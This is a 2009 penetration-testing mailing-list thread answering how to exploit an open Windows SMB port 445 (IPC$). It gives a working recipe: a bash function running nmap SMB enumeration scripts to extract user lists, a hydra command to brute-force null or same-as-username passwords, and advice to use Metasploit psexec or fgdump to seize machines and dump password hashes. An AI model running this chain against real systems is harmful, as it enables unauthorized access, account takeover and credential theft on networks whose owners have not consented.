Exploiting IPC$



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I recommend the SuperScan4 thar runs on windows.

http://www.foundstone.com/us/resources/proddesc/superscan.htm

I also use this bash script that runs with Nmap Version 5.00 or later in
backrack.


function nmapenumsmb
{
if [ $# -eq 0 ]
then
echo -e "Sintaxis: nmapenumsmb <IP>"
exit 1
fi

`which nmap` -n -d -p445 --script=smb-enum* -vv -oA nmap.enum.$1 $1
echo Getting users
echo "Login;Type;Domain;RID;Full Name;Description;Flags;Source"
nmap.enum.users.notdisabled.$1.csv
grep -B1 -A6 -e 'Type: User' nmap.enum.$1.nmap | tee
nmap.enum.usuarios.$1.txt \
| tr -d '\n' | sed 's/|\ \ [a-zA-Z0-9]/\n&/g;s/^|\ \
//g;s/|\ \ \ \ |_\ /;/g' | grep -v "Account disabled" \
| sed 's/^|\ \ //g;s/|\ \ \ \ |_\ /;/g;s/:\ /;/g' | cut
- -d\; -f1,3,5,7,9,11,13,15,17 \
| grep \;User\; | tee -a
nmap.enum.users.notdisabled.$1.csv \
| grep -ve '\$'
nmap.enum.users.notdisabled.notmachines.$1.csv
}

You add it to your ~/.bashrc and run it as nmapenumsmb IP and generate
some pretty CSV files with the enumeration information.

Or just nmap -n -d -p445 --script=smb-enum* -vv -oA nmap.enum.IP IP

You can also use Cain from www.toxid.it to make the SID brute force user
enumeration.

Then I use the hydra to test the users for same or null password . It
always works. Then you can use Super Scan to know who's Admin.

hydra -w 10 -V -L lst.users.1.per.line -es -o passwods.hydra.txt IP
smbnt -m GROUP:Domain.com.mx -m D

If you get Admin I recommend Metasploit with the smbpsexec module or
fgdump from foofus to get control/hashes of the machine. Have fun


On Wed, Dec 30, 2009 at 5:38 AM, Halley Souza <souza.halley@xxxxxxxxx>
wrote:
Try nmap scripts smb-enum-shares and smb-brute, always result =)

Halley


2009/12/29 Jerome Athias <jerome.athias@xxxxxxx>

scan/check for administrative shares
Admin$
C$

(you can find a ton of tools for this task)

then you can try a bruteforce attack
https://www.securinfos.info/outils-securite-hacking/ipc$crack.rar
THCHydra
...

RPC/DCOM sploits
Metasploit Framework

G00D L\_/CK
And Happy New Hacking Y3aR!

/JA

Le 28/12/2009 12:11, Himanshu Goyal a écrit :

Hello,

Can somebody share how to exploit port 445. I am doing a VA and found
port 445 open.

When I try to connect IPC$, it says access denied.

Thanks

Cheers-
Himanshu


- ------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification
Review Board

Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require
a full practical examination in order to become certified.

http://www.iacertification.org

- ------------------------------------------------------------------------



------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification
Review Board

Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require
a full practical examination in order to become certified.
http://www.iacertification.org
------------------------------------------------------------------------



------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review
Board

Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require
a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------




- --
Adrián Puente Z.
[www.hackarandas.com]
Donde las ideas se dispersan en bytes...

"... ruego a mi orgullo que se acompañe siempre de mi prudencia,
y si algún día mi prudencia se echara a volar, que al menos
pueda volar junto con mi locura"
--Nietzche

Huella: FBD6 4C36 2557 C64C 1318 70A8 F561 CB6F 4E40 5AFB
http://www.hackarandas.com/apuente_at_hackarandas.com.asc.gz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAktEFiMACgkQW2tF/eN2yfaeKgCeO7VBfCiOIBKVNk7s3pkbKB+l
KyEAn3rnu6rd1tZTj5LLV6Ap6j8z1crk
=mJ0x
-----END PGP SIGNATURE-----

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------



Relevant Pages

  • Re: Different ways to portscan IPS
    ... Prove to peers and potential employers without a doubt that you can ... a full practical examination in order to become certified. ... Information Assurance Certification Review ...
    (Pen-Test)
  • RE: Different ways to portscan IPS
    ... Prove to peers and potential employers without a doubt that you can ... a full practical examination in order to become certified. ... Information Assurance Certification Review ...
    (Pen-Test)
  • Re: Things to do before vulnerability disclosure
    ... yourself in legal trouble depending on your countries laws and you'd ... full practical examination in order to become certified. ... Information Assurance Certification Review Board ... Prove to peers and potential employers without a doubt that you can actually ...
    (Pen-Test)
  • Re: Verify Your Security Provider -- The truth behind manual testing.
    ... Information Assurance Certification Review Board ... Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. ... IACRB CPT and CEPT certs require a full practical examination in order to become certified. ...
    (Pen-Test)
  • Re: career advice
    ... Information Assurance Certification Review Board ... Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. ...
    (Pen-Test)